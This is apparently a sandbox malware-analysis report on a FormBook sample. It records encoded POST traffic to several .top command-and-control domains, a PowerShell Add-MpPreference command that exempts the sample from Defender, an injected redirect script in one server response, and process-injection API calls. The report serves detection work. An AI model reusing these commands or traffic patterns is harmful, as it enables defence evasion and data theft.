                                                              Sep 11, 2024 22:58:24.854794025 CEST | 437 | OUT | GET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.57ddu.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:25.784841061 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66a4adce-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              58 | 192.168.2.7 | 59719 | 152.53.38.0 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:30.819317102 CEST | 684 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=V99dEg2HZocG8VkDmCM9ywcGEadyYOGDKwjCtFOllJKL0zLFN+wv5s7uE12bDsnsuuw2FaWSnun5o9Swtd8YgnZ4Uokkgh3F3CZajAL7yUDE1Xb4ndH00xgWuQfY/gmrvyO1RE5WuZ2ToD6YI2Kkz9yrAdYuQ+HWOzoL2ot5+qKeyOScFoL/3qthxPdcz3FX1mQtA3dmlC7Aico4xA==
                                                              Sep 11, 2024 22:58:31.294392109 CEST | 279 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:31 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Sep 11, 2024 22:58:31.294471025 CEST | 713 | IN | [gzip-compressed response body]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              59 | 192.168.2.7 | 59720 | 152.53.38.0 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:33.371570110 CEST | 704 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=V99dEg2HZocGul0DkjM9lgcFI6dySuGPKwfCtHiPlbuL0WvFCbEv6s7uMV3THsn3uutDFbqSnuz5o8iwsuVOi3ZmcIkm/x3F3CZajAeWyUbEp3L4m//zohgVpQfY1AnivyOHRAZ8ubOToCKYIHKn49ytEdZmRrzTBRMHzudCwdS/z4P+fKHTp7Va1N5qkRYi3nU1NVpH61eqvOJ8n4fVpdpWT83UedwvTE8iEWM=
                                                              Sep 11, 2024 22:58:33.815606117 CEST | 279 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:33 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Sep 11, 2024 22:58:33.815907001 CEST | 713 | IN | [gzip-compressed response body]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              60 | 192.168.2.7 | 59721 | 152.53.38.0 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:35.914391994 CEST | 1717 | OUT | POST /7f48/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.nuv3.top
                                                              Origin: http://www.nuv3.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.nuv3.top/7f48/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:36.357664108 CEST | 279 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              date: Wed, 11 Sep 2024 20:58:36 GMT
                                                              server: LiteSpeed
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              transfer-encoding: chunked
                                                              connection: close
                                                              Sep 11, 2024 22:58:36.358491898 CEST | 713 | IN | [gzip-compressed response body]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              61 | 192.168.2.7 | 59722 | 152.53.38.0 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:38.457194090 CEST | 436 | OUT | GET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.nuv3.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:38.909491062 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              cache-control: private, no-cache, max-age=0
                                                              pragma: no-cache
                                                              content-length: 1249
                                                              date: Wed, 11 Sep 2024 20:58:38 GMT
                                                              server: LiteSpeed
                                                              connection: close
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                              Sep 11, 2024 22:58:38.909596920 CEST | 224 | IN | Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              62 | 192.168.2.7 | 59723 | 23.225.34.75 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:43.944741964 CEST | 690 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=el/vKm5BMwKte9Hzxb0veLzTLOc82bGrTTqrzFAeKnm7DATDxXFUtRBB7vmgjJjJQdTY7x9jL4yDncesYMcSEbNy6ONqG3ssBERbpKr7PoKMP7uydqeXofSdR16651vRYnchLdEX/fENrABYaaIm4LMJccwmCJcl3gmb8574nsal60OBM+otvAkLbA30KZwrX/dmjJUxtCrqkB4M+A==
                                                              Sep 11, 2024 22:58:44.526738882 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:44 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              63 | 192.168.2.7 | 59724 | 23.225.34.75 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:46.490766048 CEST | 710 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:47.064145088 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:46 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              64 | 192.168.2.7 | 59725 | 23.225.34.75 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:49.038165092 CEST | 1723 | OUT | POST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:49.705274105 CEST | 707 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                              65 | 192.168.2.7 | 59726 | 23.225.34.75 | 80
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:58:51.585516930 CEST | 438 | OUT | GET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.bashei.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:52.842560053 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:52 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
                                                              Sep 11, 2024 22:58:52.842576981 CEST | 449 | IN | Data Raw: 61 64 2f 35 37 36 30 31 38 36 39 2f 35 37 36 30 31 38 36 39 61 32 2e 68 74 6d 6c 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 35 37 36 30 31 38 36 39 2e 78 6e 2d 2d 74 6e 71 78 38 31 63 38 35 67 6e 31 6f 39 75 64 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64
                                                              Data Ascii: ad/57601869/57601869a2.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/
                                                              Sep 11, 2024 22:58:52.843014002 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Target ID:0
                                                              Start time:16:54:14
                                                              Start date:11/09/2024
                                                              Path:C:\Users\user\Desktop\r9856_7.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0xc80000
                                                              File size:712'192 bytes
                                                              MD5 hash:6ABB344635C64E538866F0E7386E2568
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0x970000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Users\user\Desktop\r9856_7.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0x6b0000
                                                              File size:712'192 bytes
                                                              MD5 hash:6ABB344635C64E538866F0E7386E2568
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:16:54:17
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff7fb730000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:16:54:26
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe"
                                                              Imagebase:0xf60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:8
                                                              Start time:16:54:27
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\SysWOW64\cmdkey.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                              Imagebase:0xb30000
                                                              File size:17'408 bytes
                                                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:16:54:40
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe"
                                                              Imagebase:0xf60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:16:54:53
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                                Execution Graph

                                                                Execution Coverage:10.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:173
                                                                Total number of Limit Nodes:6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46ba44662d5b0d54a8d08ae5dc9bd278f4588f200ee9ef0a951016a14dd70152
                                                                • Instruction ID: 9039be6e28662b850ff2f1c9e3d6875c4414a5415ae533a36073d2373235f323
                                                                • Opcode Fuzzy Hash: 46ba44662d5b0d54a8d08ae5dc9bd278f4588f200ee9ef0a951016a14dd70152
                                                                • Instruction Fuzzy Hash: 632289B0B112069FDB18DB69C464BAEB7F7AF89700F258469E5469F3A0DB30ED01CB51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 509b88a33b46a0c8a9f3d6044a08c1d6c5fa99f221a1d2f505eb24531513e21c
                                                                • Instruction ID: b5416b9c8456d15fbfc0dd26ec22e03b9d005bf9227695b44a9fea6139507cb6
                                                                • Opcode Fuzzy Hash: 509b88a33b46a0c8a9f3d6044a08c1d6c5fa99f221a1d2f505eb24531513e21c
                                                                • Instruction Fuzzy Hash: 7A5103B4E25208CFDB08CFAAC8546EEBBF6AF8A300F249429D419AB355DB705D45CF51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80b5a0d0fbc690182069db1c328199e1642440c1e9b76a6693f993869263c997
                                                                • Instruction ID: cdd648c79878cf3da89f458e57b31e1775f31d949613799f7c236b7a56e41398
                                                                • Opcode Fuzzy Hash: 80b5a0d0fbc690182069db1c328199e1642440c1e9b76a6693f993869263c997
                                                                • Instruction Fuzzy Hash: 6AD017F8D3D698CFC3909A60A4855F4BBBCA70B301F546096D80AA7202D5F48D82CEA8

                                                                APIs
                                                                • ResumeThread.KERNELBASE ref: 072DA362
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072DA42E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Thread$ContextResumeWow64
                                                                • String ID:
                                                                • API String ID: 1826235168-0
                                                                • Opcode ID: f97afa2325b961fe43fa11b87ecbc6d66548e165d14c097ccd1a9a025f12e86e
                                                                • Instruction ID: 0498001badccc04d6cadc9df644606a1c2ccb32de663d0d975d0123dfb0a7ad1
                                                                • Opcode Fuzzy Hash: f97afa2325b961fe43fa11b87ecbc6d66548e165d14c097ccd1a9a025f12e86e
                                                                • Instruction Fuzzy Hash: DD3158B1D0030A8FDB20DFAAC485BEEBBF5AF88314F54C429D559A7240CB789945CFA4

                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072DAA06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 21fc9023b7b24796c19a785ab5663ab1362d45a868ba0054791e836f9686a0e8
                                                                • Instruction ID: 5c59009406110e5493851f2a4fdae13855a1f79ed6aaf2266e8f35bcca143f5e
                                                                • Opcode Fuzzy Hash: 21fc9023b7b24796c19a785ab5663ab1362d45a868ba0054791e836f9686a0e8
                                                                • Instruction Fuzzy Hash: 8CA13DB1D1135A8FEB24CF68C841BEDBBB2BF48310F158169E859A7240DB749D85CF91

                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072DAA06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: d93fd65e4fcf7cb3986966bcc3a1cde069e243a5204ae1ef0595affb2cfd424d
                                                                • Instruction ID: e13faa01ea3182713f65175442007a85448a9d41b5cb629947358c33869337fc
                                                                • Opcode Fuzzy Hash: d93fd65e4fcf7cb3986966bcc3a1cde069e243a5204ae1ef0595affb2cfd424d
                                                                • Instruction Fuzzy Hash: 49913AB1D1031A8FEB24CF68C841BEDBBB2BF48310F158269E859A7240DB749D85CF91

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7AFFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
